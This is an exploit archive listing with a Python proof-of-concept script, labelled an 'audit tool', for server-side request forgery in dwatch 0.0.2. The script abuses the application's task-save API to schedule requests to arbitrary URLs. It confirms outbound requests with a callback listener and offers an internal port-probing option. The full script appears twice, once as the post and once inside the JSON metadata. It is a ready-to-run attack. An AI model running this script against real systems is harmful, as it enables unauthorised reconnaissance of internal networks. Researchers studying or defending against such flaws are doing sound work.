📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool

Description

This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...

Basic Information

ID PACKETSTORM:222328

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================

[+] Summary : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.

[+] POC :

#!/usr/bin/env python3

import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests

logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
logger = logging.getLogger("DWatchAuditor")

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class DWatchAuditorCore:
"""Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions."""

def __init__(self, target: str, callback_host: Optional[str] = None,
callback_port: int = 8888, verbose: bool = False):

parsed = urlparse(target if "://" in target else f"http://{target}")
if not parsed.netloc:
raise ValueError(f"Invalid target URL structure: {target}")

path = parsed.path if parsed.path else ""
self.base_url = f"{parsed.scheme}://{parsed.netloc}{path}".rstrip("/")

self.callback_host = callback_host
self.callback_port = callback_port
self.verbose = verbose

self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
'Content-Type': 'application/json'
})

self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
self.created_tasks: List[Dict] = []

self.callback_event = threading.Event()
self.callback_data: List[Dict] = []
self.lock = threading.Lock()

def _get_local_ip(self) -> str:
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception:
return "127.0.0.1"

def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
payload = {"name": name, "url": payload_url, "spec": spec}

try:
if self.verbose:
logger.info(f"Submitting audit payload: {name} -> {payload_url}")

response = self.session.post(self.save_endpoint, json=payload, timeout=10)

if response.status_code == 200 and response.text:
logger.info(f"Audit task '{name}' registered successfully.")
self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
return True

logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
return False

except requests.RequestException as e:
logger.error(f"Network transport error during task creation: {e}")
return False

def verify_boundary_leak(self) -> bool:
if not self.callback_host:
self.callback_host = self._get_local_ip()

timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"

logger.info(f"Callback URL: {callback_url}")
self.callback_event.clear()

server_thread = threading.Thread(target=self._run_callback_socket)
server_thread.daemon = True
server_thread.start()

time.sleep(0.5)

task_name = f"Boundary_Audit_{timestamp}"

if self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
logger.info("Waiting for inbound connection (timeout 12s)...")

triggered = self.callback_event.wait(timeout=12)

if triggered:
logger.critical("SSRF outbound boundary breach confirmed!")
self.callback_event.set()
server_thread.join(timeout=1)
return True
else:
logger.warning("No inbound request captured.")
self.callback_event.set()
server_thread.join(timeout=1)
return False

return False

def _run_callback_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

try:
server_socket.bind(("0.0.0.0", self.callback_port))
server_socket.listen(1)
server_socket.settimeout(12)

while not self.callback_event.is_set():
try:
client, addr = server_socket.accept()
self.callback_event.set()

raw_request = client.recv(2048).decode("utf-8", errors="ignore")

with self.lock:
self.callback_data.append({"sender": addr, "raw": raw_request})

logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")

try:
client.sendall(
b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
)
finally:
client.close()

except socket.timeout:
continue

except Exception as e:
logger.error(f"Callback listener error: {e}")

finally:
server_socket.close()

def check_internal_service(self, host: str, port: int) -> Dict:
url = f"http://{host}:{port}/"
task_name = f"service_recon_{port}_{int(time.time())}"

success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")

return {
"port": port,
"task_accepted": success,
"inference": (
"Task submitted - requires log verification"
if success else "Blocked or unreachable endpoint"
)
}

class InteractiveConsoleInterface:
"""User interface"""

def __init__(self, auditor: DWatchAuditorCore):
self.auditor = auditor

def display_menu(self):
while True:
print("\n" + "=" * 50)
print("dwatch SSRF Boundary Auditor")
print("=" * 50)
print("1. Run SSRF Test")
print("2. Check Internal Port")
print("3. Create Task")
print("4. View Tasks")
print("5. Exit")

choice = input("> ").strip()

if choice == "1":
self.auditor.verify_boundary_leak()

elif choice == "2":
host = input("Host: ").strip() or "127.0.0.1"
try:
port = int(input("Port: ").strip())
except ValueError:
print("Invalid port")
continue

print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))

elif choice == "3":
name = input("Task name: ").strip()
url = input("URL: ").strip()
self.auditor.create_audit_task(name, url)

elif choice == "4":
print(json.dumps(self.auditor.created_tasks, indent=2))

elif choice == "5":
break

def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True)
parser.add_argument("-c", "--callback")
parser.add_argument("-i", "--interactive", action="store_true")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()

callback_host = None
callback_port = 8888

if args.callback:
parts = args.callback.rsplit(":", 1)
callback_host = parts[0]
if len(parts) == 2:
callback_port = int(parts[1])

try:
auditor = DWatchAuditorCore(
target=args.target,
callback_host=callback_host,
callback_port=callback_port,
verbose=args.verbose
)

if args.interactive:
InteractiveConsoleInterface(auditor).display_menu()
else:
logger.info("Running SSRF boundary check...")
auditor.verify_boundary_leak()

except Exception as e:
logger.critical(f"Fatal error: {e}")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-01T18:16:39",
    "description": "This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222328",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool                                                      |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/dhjz/dwatch/                                                                                  |\n    ==================================================================================================================================\n    \n    [+] Summary    : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.\n    \t\t\t\t \n    [+] POC        : \n    \n    #!/usr/bin/env python3\n    \n    \n    import re\n    import csv\n    import json\n    import time\n    import socket\n    import logging\n    import threading\n    import argparse\n    import urllib3\n    from pathlib import Path\n    from datetime import datetime\n    from typing import Dict, List, Optional, Tuple\n    from urllib.parse import urlparse, urljoin\n    import requests\n    \n    logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')\n    logger = logging.getLogger(\"DWatchAuditor\")\n    \n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    \n    \n    class DWatchAuditorCore:\n        \"\"\"Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions.\"\"\"\n    \n        def __init__(self, target: str, callback_host: Optional[str] = None,\n                     callback_port: int = 8888, verbose: bool = False):\n    \n            parsed = urlparse(target if \"://\" in target else f\"http://{target}\")\n            if not parsed.netloc:\n                raise ValueError(f\"Invalid target URL structure: {target}\")\n    \n            path = parsed.path if parsed.path else \"\"\n            self.base_url = f\"{parsed.scheme}://{parsed.netloc}{path}\".rstrip(\"/\")\n    \n            self.callback_host = callback_host\n            self.callback_port = callback_port\n            self.verbose = verbose\n    \n            self.session = requests.Session()\n            self.session.headers.update({\n                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',\n                'Content-Type': 'application/json'\n            })\n    \n            self.save_endpoint = urljoin(self.base_url + \"/\", \"api/task/save\")\n            self.created_tasks: List[Dict] = []\n    \n            self.callback_event = threading.Event()\n            self.callback_data: List[Dict] = []\n            self.lock = threading.Lock()\n    \n        def _get_local_ip(self) -> str:\n            try:\n                with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n                    s.connect((\"8.8.8.8\", 80))\n                    return s.getsockname()[0]\n            except Exception:\n                return \"127.0.0.1\"\n    \n        def create_audit_task(self, name: str, payload_url: str, spec: str = \"*/5 * * * * *\") -> bool:\n            payload = {\"name\": name, \"url\": payload_url, \"spec\": spec}\n    \n            try:\n                if self.verbose:\n                    logger.info(f\"Submitting audit payload: {name} -> {payload_url}\")\n    \n                response = self.session.post(self.save_endpoint, json=payload, timeout=10)\n    \n                if response.status_code == 200 and response.text:\n                    logger.info(f\"Audit task '{name}' registered successfully.\")\n                    self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})\n                    return True\n    \n                logger.error(f\"Failed to create task. HTTP Status: {response.status_code}\")\n                return False\n    \n            except requests.RequestException as e:\n                logger.error(f\"Network transport error during task creation: {e}\")\n                return False\n    \n        def verify_boundary_leak(self) -> bool:\n            if not self.callback_host:\n                self.callback_host = self._get_local_ip()\n    \n            timestamp = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n            callback_url = f\"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}\"\n    \n            logger.info(f\"Callback URL: {callback_url}\")\n            self.callback_event.clear()\n    \n            server_thread = threading.Thread(target=self._run_callback_socket)\n            server_thread.daemon = True\n            server_thread.start()\n    \n            time.sleep(0.5)\n    \n            task_name = f\"Boundary_Audit_{timestamp}\"\n    \n            if self.create_audit_task(task_name, callback_url, spec=\"* * * * * *\"):\n                logger.info(\"Waiting for inbound connection (timeout 12s)...\")\n    \n                triggered = self.callback_event.wait(timeout=12)\n    \n                if triggered:\n                    logger.critical(\"SSRF outbound boundary breach confirmed!\")\n                    self.callback_event.set()\n                    server_thread.join(timeout=1)\n                    return True\n                else:\n                    logger.warning(\"No inbound request captured.\")\n                    self.callback_event.set()\n                    server_thread.join(timeout=1)\n                    return False\n    \n            return False\n    \n        def _run_callback_socket(self):\n            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    \n            try:\n                server_socket.bind((\"0.0.0.0\", self.callback_port))\n                server_socket.listen(1)\n                server_socket.settimeout(12)\n    \n                while not self.callback_event.is_set():\n                    try:\n                        client, addr = server_socket.accept()\n                        self.callback_event.set()\n    \n                        raw_request = client.recv(2048).decode(\"utf-8\", errors=\"ignore\")\n    \n                        with self.lock:\n                            self.callback_data.append({\"sender\": addr, \"raw\": raw_request})\n    \n                        logger.info(f\"Inbound connection from {addr[0]}:{addr[1]}\")\n    \n                        try:\n                            client.sendall(\n                                b\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 0\\r\\n\\r\\n\"\n                            )\n                        finally:\n                            client.close()\n    \n                    except socket.timeout:\n                        continue\n    \n            except Exception as e:\n                logger.error(f\"Callback listener error: {e}\")\n    \n            finally:\n                server_socket.close()\n    \n        def check_internal_service(self, host: str, port: int) -> Dict:\n            url = f\"http://{host}:{port}/\"\n            task_name = f\"service_recon_{port}_{int(time.time())}\"\n    \n            success = self.create_audit_task(task_name, url, spec=\"*/5 * * * * *\")\n    \n            return {\n                \"port\": port,\n                \"task_accepted\": success,\n                \"inference\": (\n                    \"Task submitted - requires log verification\"\n                    if success else \"Blocked or unreachable endpoint\"\n                )\n            }\n    \n    \n    class InteractiveConsoleInterface:\n        \"\"\"User interface\"\"\"\n    \n        def __init__(self, auditor: DWatchAuditorCore):\n            self.auditor = auditor\n    \n        def display_menu(self):\n            while True:\n                print(\"\\n\" + \"=\" * 50)\n                print(\"dwatch SSRF Boundary Auditor\")\n                print(\"=\" * 50)\n                print(\"1. Run SSRF Test\")\n                print(\"2. Check Internal Port\")\n                print(\"3. Create Task\")\n                print(\"4. View Tasks\")\n                print(\"5. Exit\")\n    \n                choice = input(\"> \").strip()\n    \n                if choice == \"1\":\n                    self.auditor.verify_boundary_leak()\n    \n                elif choice == \"2\":\n                    host = input(\"Host: \").strip() or \"127.0.0.1\"\n                    try:\n                        port = int(input(\"Port: \").strip())\n                    except ValueError:\n                        print(\"Invalid port\")\n                        continue\n    \n                    print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))\n    \n                elif choice == \"3\":\n                    name = input(\"Task name: \").strip()\n                    url = input(\"URL: \").strip()\n                    self.auditor.create_audit_task(name, url)\n    \n                elif choice == \"4\":\n                    print(json.dumps(self.auditor.created_tasks, indent=2))\n    \n                elif choice == \"5\":\n                    break\n    \n    \n    def main():\n        parser = argparse.ArgumentParser()\n        parser.add_argument(\"-t\", \"--target\", required=True)\n        parser.add_argument(\"-c\", \"--callback\")\n        parser.add_argument(\"-i\", \"--interactive\", action=\"store_true\")\n        parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n        args = parser.parse_args()\n    \n        callback_host = None\n        callback_port = 8888\n    \n        if args.callback:\n            parts = args.callback.rsplit(\":\", 1)\n            callback_host = parts[0]\n            if len(parts) == 2:\n                callback_port = int(parts[1])\n    \n        try:\n            auditor = DWatchAuditorCore(\n                target=args.target,\n                callback_host=callback_host,\n                callback_port=callback_port,\n                verbose=args.verbose\n            )\n    \n            if args.interactive:\n                InteractiveConsoleInterface(auditor).display_menu()\n            else:\n                logger.info(\"Running SSRF boundary check...\")\n                auditor.verify_boundary_leak()\n    \n        except Exception as e:\n            logger.critical(f\"Fatal error: {e}\")\n    \n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222328",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222328/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool_PACKETSTORM:222328

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply